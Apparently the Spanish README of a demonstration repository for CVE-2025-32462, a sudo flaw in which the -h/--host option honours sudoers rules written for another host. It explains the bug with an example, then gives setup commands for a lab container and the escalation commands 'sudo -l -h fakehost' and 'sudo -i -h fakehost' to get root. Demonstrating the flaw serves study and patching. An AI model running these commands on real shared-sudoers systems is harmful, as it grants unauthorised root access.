
cve-2025-32462' demostración

sudo/NEWS at SUDO_1_8_8 · sudo-project/sudo · GitHub
En la documentación de sudo -h(--host) se indica que -h solo se puede usar junto con -l. En actualizaciones posteriores se permitió que sudo -h se usara con -e, -i, etc.
sudo --host(-h) <username> -l(--list)
/etc/sudoer.d se utiliza para ver qué permisos tiene un usuario en el sistema. Este permiso podría ser evadido, permitiendo que un usuario eleve sus privilegios en un sistema a los que podría tener en otro sistema. Esto afecta especialmente a sistemas que comparten un único archivo de configuración sudoers entre múltiples equipos o que utilizan directorios de usuarios basados en red (como LDAP) para proporcionar reglas sudoers del sistema.
En resumen: la opción h/--host de sudo no sigue el principio de mínimo privilegio y no verifica los límites de las reglas de host en escenarios que no son -l (como la ejecución de comandos). Un atacante podría configurar reglas maliciosas en el archivo /etc/sudoer.d.
Afecta principalmente a los sistemas de administradores que utilizan el mismo archivo sudoers en múltiples máquinas.
La explotación de la vulnerabilidad requiere cumplir dos requisitos:
Ejemplo:
El archivo sudoers contiene reglas que definen los permisos del usuario en diferentes sistemas.
Alice hostA: some Privilege
Bob hostB: some Privilege
Bob inicia sesión en hostA y luego ejecuta el comando sudo -h hostB commandA
git clone https://github.com/SpongeBob-369/cve-2025-32462.git
cd cve-2025-32462
chmod +x run.sh
./run.sh
# after entering the contain Ubuntu
sudo -l
# then prompt you to enter your password, but "we" don't know.
sudo -l -h fakehost # Check the permissions user ubuntu have in host named fakehost
sudo -i -h fakehost # get root